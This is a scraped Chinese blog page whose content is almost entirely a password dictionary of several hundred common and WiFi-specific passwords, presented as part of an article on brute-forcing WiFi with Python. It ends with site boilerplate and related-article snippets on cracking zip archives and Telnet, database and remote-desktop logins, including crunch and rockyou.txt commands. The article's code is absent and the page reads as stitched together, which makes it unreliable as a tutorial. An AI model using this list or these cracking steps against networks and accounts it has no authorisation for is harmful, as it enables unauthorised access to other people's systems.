a1314520        
234234234       
MPYY39cr        
9409050000      
dcc7d698b1cf    
81828384        
20130909        
zhang           
%2520%2520%2520%2520%2520%2520%2520%2520        
keioplaza       
123987456       
19950601        
123456789t      
Wallace1987!    
hz123456        
11111222        
a7654321        
88892218        
6135767431      
33000999        
52013145201314  
19880818        
moto-moto       
9999900000      
aaaaaaaaaaaaa   
hy888888        
636973636f      
zhao123456      
sgepri.6186     
159753123       
77587758        
a11223344       
Fairmont        
00000002        
1234567890987654321             
555666888       
123456789ab     
19931993        
309309309       
403403403       
19881212        
306306306       
123456778       
112233456       
36936936        
087654321       
320320320       
as123456789     
5678901234      
00000123        
16816816        
517517517       
www.baidu.com   
1234567811      
13800138        
1234asdf        
4007393639      
wangchao        
03090401        
1234567890b     
hdl123456       
12345876        
888888886       
186186186       
3692581470      
a0000000        
20101010        
96969696        
0811603077      
208208208       
20112012        
123457890       
myx2rsqr        
c1234567        
290195          
lu198304        
20102010        
43218765        
1111111112      
130130130       
66688800        
19921992        
q1w2e3r4t5      
59595959        
4006797979      
79797979        
13245678        
14725888        
1123581321      
1234500000      
123456999       
jjjjjjjj        
zhu123456       
b12345678       
miaomiao        
12345678l       
5432167890      
cpic1234        
www123456789    
9876543219      
aaaa0000        
520123456       
66660000        
133133133       
qitian77        
bb123456        
108144          
wpa%252Fwpa2psk 
1112131415      
4008262616      
123321000       
future316       
88888999        
huang123456     
shinjuku        
qqqqqqqqq       
192837465       
wx123456        
4000076868      
1234567123      
admin1234       
78978978        
cisco123456     
qwertyuiopasdfghjkl             
1314520         
123456as        
123456YIyi**    
07550755        
wifimima        
hw800           
f123456789      
nideshengri     
123654123       
sb123456        
19216801        
20131234        
55552222        
13008003566     
1472583699      
19888888        
20130701        
2222288888      
aa88888888      
woshinibaba     
13145211        
51515151        
32132100        
64916677        
qweasd123       
888899999       
06060606        
223456789       
12345675        
11228899        
503503503       
78888888        
luo123456       
ty123456        
123456789l      
316316316       
he123456        
e45d23ba8665    
qqqq1111        
13140000        
14736900        
gggjjkkkkjhh    
3333388888      
20130520        
S1234567        
113113113       
12342345        
405405405       
98761234        
wl123456        
wangyang        
88008800        
131420          
67899876        
11226688        
06630663        
routeinn        
9999999998      
07623828888     
311311311       
66661111        
4008886677      
123467890       
HS123456        
zhangyan        
qqqqwwww        
5845211314      
527527527       
dddddddd        
67891234        
741258963       
98764321        
alhambraUSDstudents             
123456700       
52012345        
0518051818      
36988888        
helloworld      
33330000        
2222211111      
445400          
sin%40zhenbang  
602602602       
jh123456        
0123456780      
123987654       
d123456789      
7758521521      
66666888        
112233123       
258147369       
ABCDE54321      
508508508       
03030303        
86231800        
568568568       
4455667788      
135246789       
123451234       
123456ok        
11336699        
greentree       
20082009        
srroomguest     
321456789       
10086           
0000099999      
111111110       
00003333        
lz123456        
welcomeph       
aa111111        
ZYDX8888        
f12345678       
20148888        
2003101000      
102102102       
wobugaosuni     
0000000000000   
918918918       
19801980        
zhang888        
sapphire        
wangpeng        
28288000        
55588888        
33331111        
114114114       
mima123456      
mima1234        
12222222        
147258369.      
001001001       
80000000        
11223456        
zt123456        
106106106       
mengmeng        
0123123123      
408408408       
123456789m      
876543219       
12355678        
yl123456        
13505921057     
110110110110    
vWagM9          
123123789       
105105105       
qq123321        
8888888889      
22227777        
13580374607     
abcdefghijklmn  
8765432100      
www.hzqz.com    
407407407       
999666333       
19891212        
APTX4869        
12345678x       
sun123456       
woshishabi      
zhongqi123      
mingming        
admin12345      
123abc456       
ok123456        
383838438       
588588588       
517270          
gao123456       
75237523        
1980021600      
19831983        
guo123456       
4006006988      
long123456      
9987654321      
AAA12345678     
jc123456        
45674567        
37214728        
134317          
37213721        
wo123456        
lh123456        
19841984        
1314520123      
WH123456        
Pa123456        
98888888        
liu123456789    
9j7Tbe          
sz123456        
20130401        
0.123456789     
1231234567      
a1b1c1d1        
123456789y      
qaz123456789    
10011001        
304304304       
88990099        
YUdean2011      
xiao123456      
tj87654321      
7418529630      
210210210       
513513513       
65656565        
portsm1231      
19901010        
11224455        
19821982        
13145201314     
681478          
988888888       
****0000        
ruifeng112233   
1472583691      
1111aaaa        
00123123        
zhangtao        
wangjian        
14785236        
19881028        
zxcvbnm%5C      
zhang1234       
504504504       
yy12345678      
09715228888     
218218218       
134567890       
7gL7eW3Q        
13524678        
8989898989      
05201314        
111206          
bugeinishuo     
77585200        
209209209       
sbsbsbsb        
5841314520      
abcd5678        
maancoffee      
99999999999     
3216549870      
AA8465E6A4      
asd123123       
406406406       
wifi2013        
20110101        
ww2121          
81588301        
abcdef123456    
5201314000      
haohaoxuexi     
qwerqwer        
9898989898      
Aa1234567       
4567890123      
md52013wpa      
444455555       
2013250009      
07070707        
goodluck        
77788899        
20121101        
19861010        
xuanxuan        
yt123456        
ch123456        
as12345678      
55088660        
709514135       
85050888        
20131015        
tang123456      
23242526        
azxcvbnm        
216216216       
wanda_Moto      
IQA1552013      
dy123456        
sdnpc123        
aabbcc123       
20130303        
55554444        
95105555        
1234560123      
52013143344     
ljj327          
99995555        
5555500000      
61246666        
6868686868      
123000          
fx123456        
08277110400     
dsdL4           
77776666        
jj123456        
20130818        
67676767        
29452300        
bvcls           
04061992        
22229999        
aa123321        
Fupa%23%234489  
27272727        
cheng123        
02501806        
416416416       
1313131313      
qweasdzxc123    
wangjing        
20090909        
812345678       
my123456        
ABC95599        
cdhlg2013       
gongchengbu     
20120808        
19861212        
t12345678       
zq123456        
523523523       
20131014        
12332145        
69378261        
16816868        
tongtong        
61777777        
82910479afoundry                
lenovo123       
4006505151      
sx123456        
abc54321        
%402Yjbnmt      
19870920        
20130707        
ccb95533        
%40%40%40%40%40%40%40%40        
51851888        
0987612345      
588888888       
shenzhen%40metro                
33445200        
45454545        
618618618       
510510510       
zhangjian       
20121111        
52013149        
sunshine        
20130301        
410410410       
123456qw        
12300123        
23427292        
ys123456        
sun12345        
1112223330      
16899168        
BAOBAO888BAOBAO 
44443333        
gzlamway        
weijian65599710 
19961996        
qazwsxedcrfv    
770880520       
4006121268      
98769876        
520131415       
987321654       
00007777        
19841010        
55551111        
shanshan        
8888888a        
15757873371     
19891001        
123456789c      
cd123456        
1234567896      
000000009       
WYXY2013        
nc123456        
cmccauto        
4000851330      
132132132       
q74jgbdx3u6h8   
AAAASSSS        
heliangdongshuo328422           
qqq123456       
gtja2           
61616161        
35353535        
3gHa99tT5D      
.........       
qqwweerr        
zhao1234        
zxcvbnm.        
55555666666     
507507507       
lt123456        
123456520       
134679258       
abc123abc123    
30303030        
19930328

到了这里,关于wifi 暴力破解 (python)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 无线网卡+kali实现wifi暴力破解(密码爆破方式)

    攻击机:kali 所采用的的无线网卡:D-LINK 采用的工具:Aircrack-ng 测试开始: 首先,打开kali,将无线网卡插入。弹出提示窗口,这里选择连接到虚拟机,选择kali虚拟机。 然后点击网络连接的标志,可以看到当前环境的wifi列表。 使用命令ifconfig和iwconfig,都可以看到wlan0已开启

    2023年04月09日
    浏览(46)
  • python暴力破解压缩包密码(python暴力破解zip压缩包)

    简介 : ZIP文件格式是一种数据压缩和文档储存的文件格式,原名Deflate,发明者为菲尔·卡茨(Phil Katz),他于1989年1月公布了该格式的资料。ZIP通常使用后缀名“.zip”,它的MIME格式为application/zip。当前,ZIP格式属于几种主流的压缩格式之一,其竞争者包括RAR格式以及开放源

    2024年02月03日
    浏览(58)
  • 渗透测试——python脚本(selenium模块)暴力破解

    免责声明 本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。 背景:实习的第二个周的第二个评估网站项目,很明显,这里没有验证码(有验证码的情况也可以用这个方法,具

    2024年02月02日
    浏览(45)
  • 使用python暴力破解zip压缩包的密码

    如果你有压缩包的密码忘记了,并且压缩包的加密算法采用的是ZipCrypto,并且压缩参数如下图所示: 那么你就可以使用本文中的方法进行破解。 压缩包的加密,是根据输入的密码进行运算加密,输入不同的密码,加密后的结果就是不同的二进制流。所以在进行解密的时候,

    2024年01月21日
    浏览(40)
  • python使用字典暴力解析wifi密码

    最近无wifi可用,搜到了很多高质量但是没有密码的WiFi,我在想应该可以用python调用常见的wifi字典包来暴力破解一下这些WiFi,也许可以成功 使用pip install pywifi命令安装pywifi 在代码中设置好要扫描的wifi名后 使用它调用本机网卡,设置wifi加密方式,对字典包扫描密码逐个尝试 扫描失

    2024年02月10日
    浏览(32)
  • 口令暴力破解--Telnet协议暴力破解、数据库暴力破解与远程桌面暴力破解

    Telnet        Telnet协议是TCP/IP协议族中的一员,是Internet远程登陆服务的标准协议和主要方式。它为用户提供了在本地计算机上完成远程主机工作的能力。要开始一个telnet会话,必须输入用户名和密码来登录服务器。而一般服务器不会对用户名和密码的登录尝试做限制,因此

    2023年04月19日
    浏览(61)
  • Python 使用 pywifi 模块 破解wifi密码

    原文链接: Python 使用 pywifi 模块 破解wifi密码 上一篇: conda 换源 下一篇: TensorFlow 线性回归 拟合 git https://github.com/awkman/pywifi 常见常量 获取网卡对象 查看对象属性 查看网卡名称 断开wifi连接 连接wifi 扫描wifi信息,由于扫描需要时间,在扫描指令下达后需要等待一会才能拿到结

    2023年04月17日
    浏览(57)
  • 安全小课堂丨什么是暴力破解?如何防止暴力破解

    什么是暴力破解? 暴力破解也可称为穷举法、枚举法,是一种比较流行的密码破译方法,也就是将密码进行一一推算直到找出正确的密码为止。比如一个6位并且全部由数字组成的密码,可能有100万种组合,也就是说最多需要尝试100万次才能找到正确的密码,但也有可能尝试

    2024年04月28日
    浏览(45)
  • python手机版破解wifi脚本,python手机版安装教程

    大家好,本文将围绕python手机版破解wifi密码代码展开说明,python手机版下载安装教程是一个很多人都想弄明白的事情,想搞清楚python手机版破解wifi脚本需要先了解以下几个事情。 之前安利过一款手机上运行Python的神器Termux,不过Termux的使用比较重,它实际是一款linux系统模

    2024年04月12日
    浏览(42)
  • 暴力破解zip压缩包

    1:Windows下使用工具archpr工具进行破解 bandzip专业版也可以破解 2:python脚本破解 3:kali破解 kali自带的字典 cd /usr/share/wordlists ls sudo gunzip rockyou.txt.gz ls cat rockyou.txt crunch 3 4 1234 生成一个长度最小三位,最大四位的密码,且都由1234中的4个数字组成 crunch 3 3 123 /root/Desktop/pass.txt  把

    2024年02月09日
    浏览(40)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包